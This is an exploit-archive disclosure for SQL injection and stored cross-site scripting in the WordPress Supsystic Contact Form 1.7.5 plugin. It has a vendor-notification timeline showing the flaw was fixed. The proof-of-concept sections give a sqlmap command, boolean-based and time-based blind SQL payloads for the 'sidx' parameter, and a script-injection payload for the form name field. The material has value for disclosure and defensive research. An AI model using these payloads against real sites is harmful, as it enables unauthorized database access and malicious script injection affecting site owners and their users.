WordPress Supsystic Contact Form 1.7.5 XSS / SQL Injection

WordPress Supsystic Contact Form 1.7.5 XSS / SQL Injection: Posted Feb 8, 2021; Authored by Erik David Martin; WordPress Supsystic Contact Form plugin version 1.7.5 suffers from remote SQL injection and persistent cross site scripting vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | 56f2ae91fa06e83588a7393d88db600fbee075b5d25ff03c3f0d19147557f4cc; Download | Favorite | View

WordPress Supsystic Contact Form 1.7.5 XSS / SQL Injection

# Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-by-supsystic.1.7.5.zip
# Version: 1.7.5
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2


# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 10/12 2020: Vulnerability fixed


##################################
         SQLi
##################################


# 1. Description

The GET parameter "sidx" does not sanitize user input when searching for existing contact forms.


# 2. Proof of Concept (PoC)

Use ZAP/Burp to capture the web request when searching for existing contact forms and save it to request.txt
Referer: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic

sqlmap -r request.txt --dbms=mysql -p sidx --level=5

Parameter: sidx (GET)
  Type: boolean-based blind
  Payload: mod=forms&action=getListForTbl&pl=cfs&reqType=ajax&search[text_like]=t&_search=false&nd=1595781461778&rows=10&page=1&sidx=(SELECT (CASE WHEN (9602=9602) THEN 0x6964 ELSE (SELECT 9695 UNION SELECT 1181) END))&sord=desc

  Type: time-based blind
  Payload: mod=forms&action=getListForTbl&pl=cfs&reqType=ajax&search[text_like]=t&_search=false&nd=1595781461778&rows=10&page=1&sidx=id AND (SELECT 4102 FROM (SELECT(SLEEP(5)))vOKL)&sord=desc



##################################
      Stored XSS
##################################


# 1. Description

The "Edit name" and "Contact information" features are vulnerable to stored XXS.
Location: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic&tab=forms_edit&id=[FORM ID]


# 2. Proof of Concept (PoC)

Enter the following payload into the "Edit" field in the top left corner: "><script>alert(1)</script><!--'
The payload will execute when viewing the "Show All Forms" section.
Referer: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic&tab=forms

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

WordPress Supsystic Contact Form 1.7.5 XSS / SQL Injection

WordPress Supsystic Contact Form 1.7.5 XSS / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Supsystic Contact Form 1.7.5 XSS / SQL Injection

Share This

WordPress Supsystic Contact Form 1.7.5 XSS / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems